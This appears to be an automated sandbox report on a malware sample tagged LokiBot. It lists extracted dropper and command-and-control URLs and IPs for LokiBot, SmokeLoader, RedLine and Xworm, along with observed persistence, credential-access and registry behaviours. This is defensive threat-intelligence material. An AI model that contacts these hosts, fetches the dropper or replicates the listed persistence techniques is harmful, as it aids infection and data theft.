lokibot | 188e97ba18d7394cb3949e66c8aeb062e3ea8675371d0ee2b5126b52366530ae

max time kernel
17s
max time network
119s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
30/05/2023, 13:02

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

a.exe
Size

5KB
MD5

8ce1f6882edc51f701bbe648e40dd133
SHA1

496b3df4657e9d11df14a8ad267061d97249b511
SHA256

188e97ba18d7394cb3949e66c8aeb062e3ea8675371d0ee2b5126b52366530ae
SHA512

5826ea307fa12db5a8005fae8758314c0810e956ead3504fda7cadaccdbe737d609dfdfdc51996ab2eb350eae20398f8fbb97b16aa01f2af373c1ba20767d7d6
SSDEEP

48:6jtGAK8lb9ivcfaFSfkQLJhyPFlL8thCb/IExQpwOulavTqXSfbNtm:OI0iUaakQqDgtmQpmsvNzNt

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://slpbridge.com/storage/images/debug2.ps1

Extracted

Family

lokibot

http://194.180.48.58/web/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Extracted

Family

smokeloader

Version

2022

http://polinamailserverip.ru/

http://lamazone.site/

http://criticalosl.tech/

http://maximprofile.net/

http://zaliphone.com/

http://humanitarydp.ug/

http://zaikaopentra.com.ug/

http://zaikaopentra-com-ug.online/

http://infomalilopera.ru/

http://jskgdhjkdfhjdkjhd844.ru/

http://jkghdj2993jdjjdjd.ru/

http://kjhgdj99fuller.ru/

http://azartnyjboy.com/

http://zalamafiapopcultur.eu/

http://hopentools.site/

http://kismamabeforyougo.com/

http://kissmafiabeforyoudied.eu/

http://gondurasonline.ug/

http://nabufixservice.name/

http://filterfullproperty.ru/

rc4.i32

Extracted

Family

redline

Botnet

dusa

83.97.73.127:19045

Attributes

auth_value
ee896466545fedf9de5406175fb82de5

Extracted

Family

xworm

10.0.2.15:5555

Mutex

TNZstVyCMYPlDDeU

Attributes

install_file
ms-update.exe

aes.plain

Extracted

Family

redline

Botnet

dix

77.91.124.251:19065

Attributes

auth_value
9b544b3d9c88af32e2f5bf8705f9a2fb

Extracted

Family

redline

Botnet

diza

185.161.248.37:4138

Attributes

auth_value
0d09b419c8bc967f91c68be4a17e92ee

Extracted

Family

redline

Botnet

Redline

85.31.54.183:18435

Attributes

auth_value
50837656cba6e4dd56bfbb4a61dadb63

Signatures

Detects Stealc stealer 1 IoCs

stealer

resource	yara_rule
behavioral1/memory/2704-568-0x0000000000400000-0x0000000000684000-memory.dmp	family_stealc

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Stealc
Stealc is an infostealer written in C++.
stealer stealc
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Warzone RAT payload 3 IoCs

rat

resource	yara_rule
behavioral1/memory/2068-171-0x0000000000400000-0x0000000000560000-memory.dmp	warzonerat
behavioral1/memory/2068-174-0x0000000000400000-0x0000000000560000-memory.dmp	warzonerat
behavioral1/memory/2068-518-0x0000000000400000-0x0000000000560000-memory.dmp	warzonerat

Downloads MZ/PE file

Sets file execution options in registry 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe\DisableExceptionChainValidation = "0"	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe	GoogleUpdate.exe

Executes dropped EXE 19 IoCs

pid	Process
3420	tg.exe
340	ogumbgejapxd.exe
4732	INTERNET.exe
1156	smss.exe
2068	smss.exe
1012	1.exe
4780	putty.exe
4440	v.exe
4912	GoogleUpdate.exe
3464	IE_NET.exe
2704	DisableUAC.exe
2804	GoogleUpdate.exe
4872	GoogleUpdate.exe
2148	freebl3.dllmsvcp140.dll-0CX5H5.2.4.2.exe
724	GoogleUpdateComRegisterShell64.exe
4448	ewrue.exe
5064	GoogleUpdateComRegisterShell64.exe
4944	GoogleUpdate.exe
4320	shutdown.exe

Loads dropped DLL 12 IoCs

pid	Process
1156	smss.exe
4732	INTERNET.exe
4912	GoogleUpdate.exe
2804	GoogleUpdate.exe
4872	GoogleUpdate.exe
2148	freebl3.dllmsvcp140.dll-0CX5H5.2.4.2.exe
4872	GoogleUpdate.exe
724	GoogleUpdateComRegisterShell64.exe
4872	GoogleUpdate.exe
5064	GoogleUpdateComRegisterShell64.exe
4872	GoogleUpdate.exe
4944	GoogleUpdate.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Registers COM server for autorun 1 TTPs 33 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0CE63743-3E8B-463F-90D8-0274D20FCEBB}\InProcServer32	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0CE63743-3E8B-463F-90D8-0274D20FCEBB}\InProcServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.122\\psmachine_64.dll"	GoogleUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ThreadingModel = "Both"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0CE63743-3E8B-463F-90D8-0274D20FCEBB}\InProcServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.122\\psmachine_64.dll"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ThreadingModel = "Both"	freebl3.dllmsvcp140.dll-0CX5H5.2.4.2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0CE63743-3E8B-463F-90D8-0274D20FCEBB}\InProcServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.122\\psmachine_64.dll"	freebl3.dllmsvcp140.dll-0CX5H5.2.4.2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32\ThreadingModel = "Both"	freebl3.dllmsvcp140.dll-0CX5H5.2.4.2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.122\\psmachine_64.dll"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32\ThreadingModel = "Both"	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0CE63743-3E8B-463F-90D8-0274D20FCEBB}\InProcServer32	GoogleUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\INPROCSERVER32	freebl3.dllmsvcp140.dll-0CX5H5.2.4.2.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.122\\psmachine_64.dll"	GoogleUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\INPROCSERVER32	freebl3.dllmsvcp140.dll-0CX5H5.2.4.2.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.122\\psmachine_64.dll"	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32	freebl3.dllmsvcp140.dll-0CX5H5.2.4.2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.122\\psmachine_64.dll"	freebl3.dllmsvcp140.dll-0CX5H5.2.4.2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0CE63743-3E8B-463F-90D8-0274D20FCEBB}\InProcServer32\ThreadingModel = "Both"	freebl3.dllmsvcp140.dll-0CX5H5.2.4.2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.122\\psmachine_64.dll"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ThreadingModel = "Both"	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0CE63743-3E8B-463F-90D8-0274D20FCEBB}\InProcServer32\ThreadingModel = "Both"	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ = "C:\\Program Files (x86)\\Google\\Update\\1.3.36.122\\psmachine_64.dll"	freebl3.dllmsvcp140.dll-0CX5H5.2.4.2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0CE63743-3E8B-463F-90D8-0274D20FCEBB}\InProcServer32	freebl3.dllmsvcp140.dll-0CX5H5.2.4.2.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32\ThreadingModel = "Both"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0CE63743-3E8B-463F-90D8-0274D20FCEBB}\InProcServer32\ThreadingModel = "Both"	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D6AA569-9F30-41AD-885A-346685C74928}\InprocServer32	freebl3.dllmsvcp140.dll-0CX5H5.2.4.2.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2068-167-0x0000000000400000-0x0000000000560000-memory.dmp	upx
behavioral1/memory/2068-170-0x0000000000400000-0x0000000000560000-memory.dmp	upx
behavioral1/memory/2068-171-0x0000000000400000-0x0000000000560000-memory.dmp	upx
behavioral1/memory/2068-174-0x0000000000400000-0x0000000000560000-memory.dmp	upx
behavioral1/memory/2068-518-0x0000000000400000-0x0000000000560000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	IE_NET.exe
Key opened	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	IE_NET.exe
Key opened	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	IE_NET.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Windows\CurrentVersion\Run\jaeulpgk = "C:\\Users\\Admin\\AppData\\Roaming\\aqhl\\dtxos.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\smss.exe\" "	smss.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-640001698-3754512395-3275565439-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsAutoUpdate.exe = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsAutoUpdate.exe"	1.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3420 set thread context of 4728	3420	tg.exe	75
PID 1156 set thread context of 2068	1156	smss.exe	78

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_gu.dll	v.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_it.dll	v.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdateres_bg.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdateres_nl.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdateres_zh-TW.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\psuser.dll	v.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_bg.dll	v.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_th.dll	v.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_vi.dll	v.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_ms.dll	v.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdateres_ru.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\psuser.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateSetup.exe	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdateres_fa.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdateres_lt.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdateres_mr.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\GoogleUpdate.exe	v.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_zh-TW.dll	v.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdateres_en.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdateres_en-GB.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_ar.dll	v.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdate.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_fi.dll	v.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_ml.dll	v.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_nl.dll	v.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_sw.dll	v.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdateres_cs.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdateres_ur.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\GoogleUpdateOnDemand.exe	v.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_el.dll	v.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_en-GB.dll	v.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_te.dll	v.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdateres_lv.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateOnDemand.exe	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_cs.dll	v.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdateres_am.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdateres_es-419.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdateres_iw.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdateres_gu.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_pt-PT.dll	v.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdateres_no.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdateres_zh-CN.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_sr.dll	v.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdateres_fr.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_es-419.dll	v.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_ja.dll	v.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_pt-BR.dll	v.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleCrashHandler64.exe	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_hi.dll	v.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_ru.dll	v.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\psmachine_64.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\GoogleUpdate.exe	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_bn.dll	v.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_da.dll	v.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdate.exe	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdateres_sl.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdateres_id.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdateres_pl.dll	GoogleUpdate.exe
File opened for modification	C:\Program Files (x86)\Biskoppers.Una	INTERNET.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\psmachine.dll	v.exe
File created	C:\Program Files (x86)\Google\Temp\GUME4A8.tmp\goopdateres_fa.dll	v.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateCore.exe	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdateres_ca.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.122\goopdateres_tr.dll	GoogleUpdate.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 6 IoCs

pid	pid_target	Process	procid_target
3788	3420	WerFault.exe	67
772	2068	WerFault.exe	78
5820	4384	WerFault.exe	121
6324	4788	WerFault.exe	219
6484	3220	WerFault.exe	25
6504	3220	WerFault.exe	25

NSIS installer 4 IoCs

installer

resource	yara_rule
behavioral1/files/0x000b00000001aef2-136.dat	nsis_installer_1
behavioral1/files/0x000b00000001aef2-136.dat	nsis_installer_2
behavioral1/files/0x000b00000001aef2-144.dat	nsis_installer_1
behavioral1/files/0x000b00000001aef2-144.dat	nsis_installer_2

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	DisableUAC.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	DisableUAC.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1252	schtasks.exe
4700	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4160	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1596	taskkill.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\NumMethods	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4EB61BAC-A3B6-4760-9581-655041EF4D69}\ProgID\ = "GoogleUpdate.Update3COMClassService.1.0"	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{18D0F672-18B4-48E6-AD36-6E6BF01DBBC4}\ProxyStubClsid32	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B3A47570-0A85-4AEA-8270-529D47899603}\NumMethods\ = "4"	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{18D0F672-18B4-48E6-AD36-6E6BF01DBBC4}\NumMethods	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0CE63743-3E8B-463F-90D8-0274D20FCEBB}\InProcServer32\ThreadingModel = "Both"	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{27634814-8E41-4C35-8577-980134A96544}\NumMethods	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8A1D4361-2C08-4700-A351-3EAA9CBFF5E4}\LocalServer32	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.ProcessLauncher\ = "Google Update Process Launcher Class"	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2E629606-312A-482F-9B12-2C4ABF6F0B6D}\NumMethods	freebl3.dllmsvcp140.dll-0CX5H5.2.4.2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ = "IJobObserver"	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3D05F64F-71E3-48A5-BF6B-83315BC8AE1F}\NumMethods	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BCDCB538-01C0-46D1-A6A7-52F4D021C272}\ProxyStubClsid32	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25461599-633D-42B1-84FB-7CD68D026E53}\LocalServer32	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0CE63743-3E8B-463F-90D8-0274D20FCEBB}\InProcServer32\ThreadingModel = "Both"	freebl3.dllmsvcp140.dll-0CX5H5.2.4.2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\ProxyStubClsid32\ = "{0CE63743-3E8B-463F-90D8-0274D20FCEBB}"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{909489C2-85A6-4322-AA56-D25278649D67}\NumMethods\ = "4"	freebl3.dllmsvcp140.dll-0CX5H5.2.4.2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964}\ = "IProcessLauncher"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.CredentialDialogMachine.1.0\ = "GoogleUpdate CredentialDialog"	GoogleUpdate.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\APPID\GOOGLEUPDATE.EXE	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DAB1D343-1B2A-47F9-B445-93DC50704BFE}\NumMethods\ = "4"	freebl3.dllmsvcp140.dll-0CX5H5.2.4.2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{6F8BD55B-E83D-4A47-85BE-81FFA8057A69}	GoogleUpdate.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{521FDB42-7130-4806-822A-FC5163FAD983}	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0CE63743-3E8B-463F-90D8-0274D20FCEBB}	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF}\ProxyStubClsid32\ = "{0CE63743-3E8B-463F-90D8-0274D20FCEBB}"	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2D363682-561D-4C3A-81C6-F2F82107562A}\ = "IGoogleUpdate3WebSecurity"	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\ = "IPolicyStatus3"	freebl3.dllmsvcp140.dll-0CX5H5.2.4.2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4E223325-C16B-4EEB-AEDC-19AA99A237FA}\ProxyStubClsid32\ = "{0CE63743-3E8B-463F-90D8-0274D20FCEBB}"	GoogleUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\NumMethods	GoogleUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9B2340A0-4068-43D6-B404-32E27217859D}\LocalizedString = "@C:\\Program Files (x86)\\Google\\Update\\1.3.36.122\\goopdate.dll,-3000"	GoogleUpdate.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{1C4CDEFF-756A-4804-9E77-3E8EB9361016}\VERSIONINDEPENDENTPROGID	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{27634814-8E41-4C35-8577-980134A96544}\ = "IPolicyStatusValue"	freebl3.dllmsvcp140.dll-0CX5H5.2.4.2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BCDCB538-01C0-46D1-A6A7-52F4D021C272}\ProxyStubClsid32	GoogleUpdate.exe
